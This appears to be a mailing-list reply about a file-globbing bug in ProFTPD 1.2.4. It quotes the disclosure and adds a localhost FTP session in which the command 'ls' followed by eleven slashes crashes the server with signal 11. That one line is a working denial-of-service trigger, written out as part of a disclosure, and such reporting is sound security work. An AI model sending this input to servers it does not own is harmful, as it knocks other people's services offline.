> SUMMARY
> =======
> A problem in handling file globbing exists in the current version of
ProFTPD
> 1.2.4 (but it's fixed in the Candidate version: 1.2.5rc1). This
> is very similar to the wu-ftpd bug ("ls ~{") and occurs when you issue
> the command: ls /////////// (11 or more '/'). I haven't figured out if
> it's exploitable. That's why I post it to you guys. :-)
> ....
Connected to localhost.
220 ProFTPD 1.2.4 Server (Debian) [XXXX]
Name (localhost:muikku):
331 Password required for muikku.
Password:
230 User muikku logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ///////////
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
421 Service not available, remote server has closed connection
Dec 19 19:43:51 nl proftpd[5774]: XXXX (localhost[127.0.0.1]) - ProFTPD
terminating (signal 11)
nice :o
